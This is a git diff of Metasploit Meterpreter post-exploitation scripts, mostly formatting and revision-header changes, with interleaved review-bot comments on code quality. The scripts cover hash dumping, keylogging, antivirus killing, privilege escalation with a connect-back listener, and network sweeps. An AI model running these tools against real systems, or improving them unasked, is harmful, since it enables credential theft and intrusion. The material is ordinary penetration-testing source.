44, 44, 47, 47, + 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, + 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, + 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, + 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, + 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, + 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, + 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, + 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, + 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, + 
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, + 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, + 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, + 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 ] def capture_boot_key @@ -86,7 +87,7 @@ def capture_hboot_key(bootkey) rc4.key = hash.digest hbootkey = rc4.update(vf[0x80, 32]) hbootkey << rc4.final - return hbootkey + return hbootkey end def capture_user_keys diff --git a/scripts/meterpreter/hostsedit.rb b/scripts/meterpreter/hostsedit.rb index 40f1b1a2bf..f86fe6e5ba 100644 --- a/scripts/meterpreter/hostsedit.rb +++ b/scripts/meterpreter/hostsedit.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # Meterpreter script for modifying the hosts file in windows # given a single entrie or several in a file and clear the # DNS cache on the target machine. diff --git a/scripts/meterpreter/keylogrecorder.rb b/scripts/meterpreter/keylogrecorder.rb index ae8f202f5a..62965a9d27 100644 --- a/scripts/meterpreter/keylogrecorder.rb +++ b/scripts/meterpreter/keylogrecorder.rb @@ -87,7 +87,7 @@ def startkeylogger(session) begin #print_status("Grabbing Desktop Keyboard Input...") #session.ui.grab_desktop - print_status("Starting the keystroke sniffer...") + print_status("Starting the keystroke sniffer...") session.ui.keyscan_start return true rescue diff --git a/scripts/meterpreter/killav.rb b/scripts/meterpreter/killav.rb index bc48fc440f..a631f01f1f 100644 --- a/scripts/meterpreter/killav.rb +++ b/scripts/meterpreter/killav.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script that kills all Antivirus processes # Provided by: Jerome Athias diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb index 5cec941082..f1087e53ac 100644 --- a/scripts/meterpreter/metsvc.rb +++ b/scripts/meterpreter/metsvc.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for installing the meterpreter service 
diff --git a/scripts/meterpreter/migrate.rb b/scripts/meterpreter/migrate.rb index 34bacad9fd..e2f42bc739 100644 --- a/scripts/meterpreter/migrate.rb +++ b/scripts/meterpreter/migrate.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Simple example script that migrates to a specific process by name. # This is meant as an illustration. diff --git a/scripts/meterpreter/multi_console_command.rb b/scripts/meterpreter/multi_console_command.rb index d63b5e888c..7fe7850a33 100644 --- a/scripts/meterpreter/multi_console_command.rb +++ b/scripts/meterpreter/multi_console_command.rb @@ -11,10 +11,11 @@ # Setting Arguments @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false,"Help menu." ], - "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."], - "-rc" => [ true,"Text file with list of commands, one per line."] + "-h" => [ false,"Help menu." ], + "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."], + "-rc" => [ true,"Text file with list of commands, one per line."] ) + #Setting Argument variables commands = [] script = [] @@ -46,30 +47,29 @@ def usage end ################## Main ################## @@exec_opts.parse(args) { |opt, idx, val| - case opt - - when "-cl" - commands = val.split(",") - when "-rc" - script = val - if not ::File.exists?(script) - raise "Command List File does not exists!" - else - ::File.open(script, "r").each_line do |line| - commands << line.chomp - end - end - - when "-h" - help = 1 - end - + case opt + + when "-cl" + commands = val.split(",") + when "-rc" + script = val + if not ::File.exists?(script) + raise "Command List File does not exists!" + else + ::File.open(script, "r").each_line do |line| + commands << line.chomp + end + end + + when "-h" + help = 1 + end } if args.length == 0 or help == 1 usage else - list_con_exec(commands) - raise Rex::Script::Completed + list_con_exec(commands) + raise Rex::Script::Completed end 
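Review bot: The `-rc` branch's `::File.open(script, "r").each_line do |line| … end` never closes the file it opens, because nothing retains the handle to close it; `::File.foreach(script) { |line| commands << line.chomp }` reads the lines and closes in one step. The same open-without-close shape appears in the `-r` branch of process_memdump.rb and in the `-rc` and `-l` branches of schtasksabuse.rb later in this diff. `::File.exist?` is the canonical spelling; `exists?` is an alias that later Rubies deprecate and remove. The `parse` block is complete within the hunk, but `commands`, `script` and `help` are assigned above it.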
diff --git a/scripts/meterpreter/multicommand.rb b/scripts/meterpreter/multicommand.rb index dc105c0496..707b292bef 100644 --- a/scripts/meterpreter/multicommand.rb +++ b/scripts/meterpreter/multicommand.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for running multiple commands on Windows 2003, Windows Vista # and Windows XP and Windows 2008 targets. #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com @@ -8,10 +9,10 @@ session = client wininfo = client.sys.config.sysinfo # Setting Arguments @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false,"Help menu." ], - "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."], - "-f" => [ true,"File where to saved output of command."], - "-rc" => [ true,"Text file with list of commands, one per line."] + "-h" => [ false,"Help menu." ], + "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."], + "-f" => [ true,"File where to saved output of command."], + "-rc" => [ true,"Text file with list of commands, one per line."] ) #Setting Argument variables commands = [] @@ -52,11 +53,11 @@ def list_exec(session,cmdlst) end # Function for writing results of other functions to a file def filewrt(file2wrt, data2wrt) - output = ::File.open(file2wrt, "a") - data2wrt.each_line do |d| - output.puts(d) - end - output.close + output = ::File.open(file2wrt, "a") + data2wrt.each_line do |d| + output.puts(d) + end + output.close end def usage diff --git a/scripts/meterpreter/multiscript.rb b/scripts/meterpreter/multiscript.rb index fbfb18700e..c798ca1452 100644 --- a/scripts/meterpreter/multiscript.rb +++ b/scripts/meterpreter/multiscript.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for running multiple scripts on a Meterpreter Session #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com #Verion: 0.2 
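Review bot: `filewrt` opens `file2wrt` for append and relies on a trailing `output.close`, so any exception from `output.puts` leaves the handle open; the block form closes it on every path: `::File.open(file2wrt, "a") { |output| data2wrt.each_line { |d| output.puts(d) } }`. The `filewrt` in netenum.rb later in this diff ends the same way (`output.close` before `end`), though its body is mostly outside that hunk, so it presumably wants the same change.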
diff --git a/scripts/meterpreter/netenum.rb b/scripts/meterpreter/netenum.rb index e9d33a6f51..fd07509429 100644 --- a/scripts/meterpreter/netenum.rb +++ b/scripts/meterpreter/netenum.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # #Meterpreter script for ping sweeps on Windows 2003, Windows Vista #Windows 2008 and Windows XP targets using native windows commands. @@ -7,16 +8,15 @@ #Note: ################## Variable Declarations ################## @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu."], - "-r" => [ true, "The target address range or CIDR identifier"], - "-ps" => [ false, "To Perform Ping Sweep on IP Range"], - "-rl" => [ false, "To Perform DNS Reverse Lookup on IP Range"], - "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"], - "-hl" => [ true, "File with Host List for DNS Forward Lookup"], - "-d" => [ true, "Domain Name for DNS Forward Lookup"], - "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"], - "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"] - + "-h" => [ false, "Help menu."], + "-r" => [ true, "The target address range or CIDR identifier"], + "-ps" => [ false, "To Perform Ping Sweep on IP Range"], + "-rl" => [ false, "To Perform DNS Reverse Lookup on IP Range"], + "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"], + "-hl" => [ true, "File with Host List for DNS Forward Lookup"], + "-d" => [ true, "Domain Name for DNS Forward Lookup"], + "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"], + "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"] ) session = client host,port = session.tunnel_peer.split(':') 
@@ -44,15 +44,15 @@ def stdlookup(session,domain,dest) results = [] garbage = [] types.each do |t| - begin - r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - mxout << d - end - r.channel.close - r.close - results = mxout.join.split(/\n/) - results.each do |rec| + begin + r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + mxout << d + end + r.channel.close + r.close + results = mxout.join.split(/\n/) + results.each do |rec| if rec.match(/\s*internet\saddress\s\=\s/) garbage << rec.split(/\s*internet\saddress\s\=/) print_status("#{garbage[0].join.sub(" "," ")} #{t} ") @@ -60,13 +60,14 @@ def stdlookup(session,domain,dest) garbage.clear end garbage.clear + end + + rescue ::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") end - - rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - end end end + #------------------------------------------------------------------------------- # Function for writing results of other functions to a file def filewrt(file2wrt, data2wrt) @@ -76,6 +77,7 @@ def filewrt(file2wrt, data2wrt) end output.close end + #------------------------------------------------------------------------------- # Function for Executing Reverse lookups def reverselookup(session,iprange,dest) 
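Review bot: `rescue ::Exception => e` at the end of the `types.each` body catches `Interrupt`, `SystemExit` and `NoMemoryError` along with genuine lookup failures, so a Ctrl-C during the loop is reported as "The following Error was encountered" and iteration simply continues; `rescue ::StandardError => e` (or a bare `rescue => e`) is what is wanted. The same `rescue ::Exception` appears in reverselookup, frwdlp and pingsweep below and in wmicexec in remotewinenum.rb. `mxout` is appended to inside the loop (`mxout << d`) and never cleared within the hunk, so if it is declared once above the loop (its declaration is outside the hunk) each later record type re-parses the earlier types' output — worth confirming. `garbage[0].join.sub(" "," ")` reads as a no-op as rendered here; if it was meant to collapse a tab or a run of spaces, `squeeze(" ")` or an explicit pattern would make the intent visible. stdlookup begins before the hunk.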
@@ -86,49 +88,50 @@ def reverselookup(session,iprange,dest) i, a = 0, [] begin ipadd = Rex::Socket::RangeWalker.new(iprange) - numip = ipadd.num_ips - while (iplst.length < numip) - ipa = ipadd.next_ip - if (not ipa) - break - end - iplst << ipa - end + numip = ipadd.num_ips + while (iplst.length < numip) + ipa = ipadd.next_ip + if (not ipa) + break + end + iplst << ipa + end begin - iplst.each do |ip| - if i < 10 - a.push(::Thread.new { - r = session.sys.process.execute("nslookup #{ip}", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - if d =~ /(Name)/ - d.scan(/Name:\s*\S*\s/) do |n| - hostname = n.split(": ") - print_status "\t #{ip} is #{hostname[1].chomp("\n")}" - filewrt(dest,"#{ip} is #{hostname[1].chomp("\n")}") - end - break - - end - - end - - r.channel.close - r.close - - }) - i += 1 - else - sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? - i = 0 - end - end - a.delete_if {|x| not x.alive?} while not a.empty? - end + iplst.each do |ip| + if i < 10 + a.push(::Thread.new { + r = session.sys.process.execute("nslookup #{ip}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ /(Name)/ + d.scan(/Name:\s*\S*\s/) do |n| + hostname = n.split(": ") + print_status "\t #{ip} is #{hostname[1].chomp("\n")}" + filewrt(dest,"#{ip} is #{hostname[1].chomp("\n")}") + end + break + + end + + end + + r.channel.close + r.close + + }) + i += 1 + else + sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? + i = 0 + end + end + a.delete_if {|x| not x.alive?} while not a.empty? + end rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - + print_status("The following Error was encountered: #{e.class} #{e}") + end end + #------------------------------------------------------------------------------- #Function for Executing Forward Lookups def frwdlp(session,hostlst,domain,dest) 
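Review bot: The throttle in `iplst.each` drops an address: when `i` reaches 10 the `else` branch drains the pool and resets `i` but never starts a lookup for the `ip` of that iteration, so every 11th IP in the range is silently skipped; pingsweep in the next hunk has the identical structure and the same gap. Draining before dispatch, as below, keeps the pool bounded without losing the current address. Exceptions raised inside the `::Thread.new` blocks are not caught by the enclosing `rescue` (the threads are only polled with `alive?`, never joined), so a failed nslookup is lost without any output — a `rescue` inside the thread body would surface it. `hostname[1].chomp("\n")` assumes the `Name:` match contained ": "; a line without it makes `hostname[1]` nil and raises inside the thread. reverselookup's `def` line precedes the hunk.
```ruby
iplst.each do |ip|
  # drain the pool before dispatching, so the current ip is never dropped
  if i >= 10
    sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
    i = 0
  end
  a.push(::Thread.new {
    # … unchanged: nslookup execute, channel read, filewrt, close …
  })
  i += 1
end
```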
@@ -139,38 +142,39 @@ def frwdlp(session,hostlst,domain,dest) threads = [] tmpout = [] begin - if ::File.exists?(hostlst) - ::File.open(hostlst).each {|line| - threads << ::Thread.new(line) { |h| - #print_status("checking #{h.chomp}") - r = session.sys.process.execute("nslookup #{h.chomp}.#{domain}", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - if d =~ /(Name)/ - d.scan(/Name:\s*\S*\s*Address\w*:\s*.*?.*?.*/) do |n| - tmpout << n.split - end - break - end - end - - r.channel.close - r.close + if ::File.exists?(hostlst) + ::File.open(hostlst).each {|line| + threads << ::Thread.new(line) { |h| + #print_status("checking #{h.chomp}") + r = session.sys.process.execute("nslookup #{h.chomp}.#{domain}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ /(Name)/ + d.scan(/Name:\s*\S*\s*Address\w*:\s*.*?.*?.*/) do |n| + tmpout << n.split + end + break + end + end + + r.channel.close + r.close + } } - } - threads.each { |aThread| aThread.join } - tmpout.uniq.each do |t| - print_status("\t#{t.join.sub(/Address\w*:/, "\t")}") - filewrt(dest,"#{t.join.sub(/Address\w*:/, "\t")}") - end - - else - print_status("File #{hostlst}does not exists!") - exit - end + threads.each { |aThread| aThread.join } + tmpout.uniq.each do |t| + print_status("\t#{t.join.sub(/Address\w*:/, "\t")}") + filewrt(dest,"#{t.join.sub(/Address\w*:/, "\t")}") + end + + else + print_status("File #{hostlst}does not exists!") + exit + end rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") + print_status("The following Error was encountered: #{e.class} #{e}") end end + #------------------------------------------------------------------------------- #Function for Executing Ping Sweep def pingsweep(session,iprange,dest) 
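Review bot: `exit` inside the `begin … rescue ::Exception` block does not stop the script: `exit` raises `SystemExit`, which `rescue ::Exception` catches, so the missing-file path prints "The following Error was encountered: SystemExit exit" and frwdlp returns normally. Use `return` there (or `raise Rex::Script::Completed`, the convention the other scripts in this commit follow) and narrow the rescue to `::StandardError`. `::File.open(hostlst).each {|line| …}` never closes the file; `::File.foreach(hostlst) { |line| … }` does. The message `"File #{hostlst}does not exists!"` is missing a space before "does". frwdlp's `def` line precedes the hunk.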
@@ -184,42 +188,42 @@ def pingsweep(session,iprange,dest) numip = ipadd.num_ips while (iplst.length < numip) ipa = ipadd.next_ip - if (not ipa) - break - end + if (not ipa) + break + end iplst << ipa end begin - iplst.each do |ip| - if i < 10 - a.push(::Thread.new { - r = session.sys.process.execute("ping #{ip} -n 1", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - if d =~ /(Reply)/ - print_status "\t#{ip} host found" - filewrt(dest,"#{ip} host found") - r.channel.close - elsif d =~ /(Antwort)/ - print_status "\t#{ip} host found" - filewrt(dest,"#{ip} host found") - r.channel.close - end - end - r.channel.close - r.close - - }) - i += 1 - else - sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? - i = 0 - end - end - a.delete_if {|x| not x.alive?} while not a.empty? - end + iplst.each do |ip| + if i < 10 + a.push(::Thread.new { + r = session.sys.process.execute("ping #{ip} -n 1", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ /(Reply)/ + print_status "\t#{ip} host found" + filewrt(dest,"#{ip} host found") + r.channel.close + elsif d =~ /(Antwort)/ + print_status "\t#{ip} host found" + filewrt(dest,"#{ip} host found") + r.channel.close + end + end + r.channel.close + r.close + + }) + i += 1 + else + sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? + i = 0 + end + end + a.delete_if {|x| not x.alive?} while not a.empty? + end rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - + print_status("The following Error was encountered: #{e.class} #{e}") + end end #------------------------------------------------------------------------------- 
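Review bot: Inside the thread body, `r.channel.close` runs when a Reply/Antwort line matches and then again unconditionally after the loop, and the `while` condition calls `r.channel.read` once more on the already-closed channel before the loop exits; a `break` after the match, leaving the single close after the loop, is the usual shape. The throttle gap that skips every 11th address is shared with reverselookup and is described on that hunk. pingsweep's `def` line precedes the hunk.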
@@ -229,9 +233,10 @@ def srvreclkp(session,domain,dest) srout = [] garbage = [] srvrcd = [ - "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.", - "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.", - "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."] + "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.", + "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.", + "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp." + ] print_status("Performing SRV Record Enumeration for #{domain}") filewrt(dest,"SRV Record Enumeration for #{domain}") srvrcd.each do |srv| @@ -276,33 +281,33 @@ srvrc = nil # Parsing of Options @@exec_opts.parse(args) { |opt, idx, val| case opt - when "-sr" - srvrc = 1 - when "-rl" - rvrslkp = 1 - when "-fl" - frdlkp = 1 - when "-ps" - pngsp = 1 - when "-st" - stdlkp = 1 - when "-d" - dom = val - when "-hl" - hostlist = val - when "-r" - range = val - - when "-h" - print( - "Network Enumerator Meterpreter Script\n" + - "Usage:\n" + - @@exec_opts.usage - ) - helpcall = 1 - end - + when "-sr" + srvrc = 1 + when "-rl" + rvrslkp = 1 + when "-fl" + frdlkp = 1 + when "-ps" + pngsp = 1 + when "-st" + stdlkp = 1 + when "-d" + dom = val + when "-hl" + hostlist = val + when "-r" + range = val + + when "-h" + print( + "Network Enumerator Meterpreter Script\n" + + "Usage:\n" + + @@exec_opts.usage + ) + helpcall = 1 + end } + if client.platform =~ /win32|win64/ if range != nil && pngsp == 1 message(logs) @@ -320,10 +325,9 @@ if client.platform =~ /win32|win64/ message(logs) srvreclkp(session,dom,dest) elsif helpcall == nil - print( - "Network Enumerator Meterpreter Script\n" + - "Usage: \n" + - @@exec_opts.usage) + print("Network Enumerator Meterpreter Script\n" + + "Usage: \n" + + @@exec_opts.usage) end else 
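Review bot: The SRV name list added here contains `"_aix._tcp."` twice, so that record is looked up and reported twice on every run; drop the duplicate (or build the list with `%w[…]` and call `.uniq` on it). `srvrcd` is a literal that never changes, so it could also live as a frozen constant above the method instead of being rebuilt per call. srvreclkp's body continues outside the hunk.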
diff --git a/scripts/meterpreter/panda_2007_pavsrv51.rb b/scripts/meterpreter/panda_2007_pavsrv51.rb index eb8ea21edf..1965d47e43 100644 --- a/scripts/meterpreter/panda_2007_pavsrv51.rb +++ b/scripts/meterpreter/panda_2007_pavsrv51.rb @@ -1,4 +1,5 @@ # $Id: panda_2007_pavsrv51.rb 8734 2010-03-07 22:49:08Z mc $ +# $Revision: $ ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -13,7 +14,7 @@ # local attacker can gain elevated privileges. # # This script has only been tested against Panda Antivirus 2007. -# +# # BID - 4257 # mc[@]metasploit.com ## @@ -22,9 +23,9 @@ # Options # opts = Rex::Parser::Arguments.new( - "-h" => [ false, "This help menu"], - "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], - "-p" => [ true, "The port on the remote host where Metasploit is listening"] + "-h" => [ false, "This help menu"], + "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], + "-p" => [ true, "The port on the remote host where Metasploit is listening"] ) # @@ -38,16 +39,16 @@ rport = 4444 # Option parsing # opts.parse(args) do |opt, idx, val| - case opt - when "-h" - print_status("Panda Antivirus 2007 privilege escalation.") + case opt + when "-h" + print_status("Panda Antivirus 2007 privilege escalation.") print_line(opts.usage) raise Rex::Script::Completed - when "-r" - rhost = val - when "-p" - rport = val.to_i - end + when "-r" + rhost = val + when "-p" + rport = val.to_i + end end if client.platform =~ /win32|win64/ client.sys.process.get_processes().each do |m| diff --git a/scripts/meterpreter/pml_driver_config.rb b/scripts/meterpreter/pml_driver_config.rb index 9c022505f1..f004237842 100644 --- a/scripts/meterpreter/pml_driver_config.rb +++ b/scripts/meterpreter/pml_driver_config.rb 
@@ -1,4 +1,5 @@ # $Id$ +# $Revision$ ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/scripts/meterpreter/powerdump.rb b/scripts/meterpreter/powerdump.rb index b50480c07b..772efa94b1 100644 --- a/scripts/meterpreter/powerdump.rb +++ b/scripts/meterpreter/powerdump.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry # keys. This script requires you to be running as system in order to work properly. This has currently been @@ -46,12 +47,12 @@ def dumphash(session) begin while ((data = hashes.read) != nil) data=data.strip - puts(data) + print_line(data) end rescue EOFError ensure hashes.close - end + end print_status("Setting Execution policy back to Restricted...") session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true}) print_status("Cleaning up after ourselves...") diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb index 8f90ebf8db..0623cc20f8 100644 --- a/scripts/meterpreter/prefetchtool.rb +++ b/scripts/meterpreter/prefetchtool.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for extracting information from windows prefetch folder #Provided by Milo at keith.lee2012[at]gmail.com #Verion: 0.1.0 
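Review bot: In dumphash the status line `print_status("Setting Execution policy back to Restricted...")` is immediately followed by `session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", …)`, so the message and the command disagree: either the text is wrong or the cleanup leaves PowerShell's execution policy relaxed after the script claims to have restored it. If the intent is to restore, the argument should be `Restricted` — or, better, the value in effect before the script changed it, if that is captured earlier in the method (dumphash begins before the hunk). `'Hidden' => 'true'` passes a string where the neighbouring `'Channelized' => true` passes a boolean; both are truthy, but the mixed forms invite a later `== true` check to fail.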
@@ -12,13 +13,13 @@ require 'digest/sha1' # Script Options @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu."], - "-p" => [ false, "List Installed Programs"], - "-c" => [ false, "Disable SHA1/MD5 checksum"], - "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"], - "-i" => [ false, "Perform lookup for software name"], - "-l" => [ false, "Download Prefetch Folder Analysis Log"] - ) + "-h" => [ false, "Help menu."], + "-p" => [ false, "List Installed Programs"], + "-c" => [ false, "Disable SHA1/MD5 checksum"], + "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"], + "-i" => [ false, "Perform lookup for software name"], + "-l" => [ false, "Download Prefetch Folder Analysis Log"] +) @tempdir = @session.fs.file.expand_path("%TEMP%") diff --git a/scripts/meterpreter/process_memdump.rb b/scripts/meterpreter/process_memdump.rb index a5a404341d..2b3c18560a 100644 --- a/scripts/meterpreter/process_memdump.rb +++ b/scripts/meterpreter/process_memdump.rb @@ -27,9 +27,9 @@ opts.parse(args) { |opt, idx, val| when "-h" print_line("") print_line("USAGE:") - print_line("EXAMPLE: run process_dump putty.exe") - print_line("EXAMPLE: run process_dump -p 1234") - print_line(opts.usage) + print_line("EXAMPLE: run process_dump putty.exe") + print_line("EXAMPLE: run process_dump -p 1234") + print_line(opts.usage) raise Rex::Script::Completed when "-p" pid = val @@ -40,15 +40,15 @@ opts.parse(args) { |opt, idx, val| when "-q" query = true when "-r" - list = val + list = val resource = "" - if not ::File.exists?(list) - raise "Command List File does not exists!" - else - ::File.open(list, "r").each_line do |line| - resource << line - end - end + if not ::File.exists?(list) + raise "Command List File does not exists!" + else + ::File.open(list, "r").each_line do |line| + resource << line + end + end end } 
@@ -107,7 +107,7 @@ def dump_mem(pid,name, toggle) base_size += mbi["RegionSize"] end print_status("Saving Dumped Memory to #{dumpfile}") - + end # Function to query process Size diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb index 22c68f4fc6..068a4b8512 100644 --- a/scripts/meterpreter/remotewinenum.rb +++ b/scripts/meterpreter/remotewinenum.rb @@ -11,10 +11,10 @@ rpass = nil trg = "" # Script Options @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu."], - "-t" => [ true, "The target address"], - "-u" => [ true, "User on the target system (If not provided it will use credential of process)"], - "-p" => [ true, "Password of user on target system"] + "-h" => [ false, "Help menu."], + "-t" => [ true, "The target address"], + "-u" => [ true, "User on the target system (If not provided it will use credential of process)"], + "-p" => [ true, "Password of user on target system"] ) # Create Filename info to be appended to downloaded files 
@@ -57,28 +57,28 @@ def wmicexec(session,wmic,user,pass,trgt) tmpout = '' command = nil runfail = 0 - runningas = session.sys.config.getuid + runningas = session.sys.config.getuid begin - tmp = session.fs.file.expand_path("%TEMP%") - # Temporary file on windows host to store results - wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt" - - wmic.each do |wmi| - if user == nil - print_status("The commands will be ran under the credentials of #{runningas}") - command = "/node:#{trgt} /append:#{wmicfl} #{wmi}" - else - command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}" - end - print_status "\trunning command wimic #{wmi}" - r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) - sleep(1) - r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'}) - sleep(1) - r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) - sleep(1) - #print_status "\twmic #{command}" - r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true}) + tmp = session.fs.file.expand_path("%TEMP%") + # Temporary file on windows host to store results + wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt" + + wmic.each do |wmi| + if user == nil + print_status("The commands will be ran under the credentials of #{runningas}") + command = "/node:#{trgt} /append:#{wmicfl} #{wmi}" + else + command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}" + end + print_status "\trunning command wimic #{wmi}" + r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + r = session.sys.process.execute("cmd.exe /c 
echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + #print_status "\twmic #{command}" + r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true}) #Making sure that wmic finishes before executing next wmic command prog2check = "wmic.exe" found = 0 @@ -92,17 +92,17 @@ def wmicexec(session,wmic,user,pass,trgt) end end end - r.close - end - # Read the output file of the wmic commands - wmioutfile = session.fs.file.new(wmicfl, "rb") - until wmioutfile.eof? - tmpout << wmioutfile.read - end - # Close output file in host - wmioutfile.close + r.close + end + # Read the output file of the wmic commands + wmioutfile = session.fs.file.new(wmicfl, "rb") + until wmioutfile.eof? + tmpout << wmioutfile.read + end + # Close output file in host + wmioutfile.close rescue ::Exception => e - print_status("Error running WMIC commands: #{e.class} #{e}") + print_status("Error running WMIC commands: #{e.class} #{e}") end # We delete the file with the wmic command output. c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true}) 
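Review bot: In wmicexec the three `echo … >> #{wmicfl}` executions and the `wmic` execution each overwrite `r` without closing the previous process handle; only the last `r` is closed by the `r.close` further down the hunk, so every `wmi` iteration leaks three handles — call `.close` on each result, or don't keep the result for the echo commands at all. `user` and `pass` are interpolated unquoted into `cmd.exe /c wmic #{command}`, so a password containing cmd metacharacters (`&`, `|`, `^`, `"` or a space) breaks or silently truncates the command; quote both values when `command` is built. `'Hidden' => 'true'` (a string) is used for the echo calls and `'Hidden' => true` for the wmic call in the same method — pick the boolean. `if user == nil` reads better as `if user.nil?`. wmicexec's `def` line precedes the hunk and its `wmic.each` block continues into the second hunk here.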
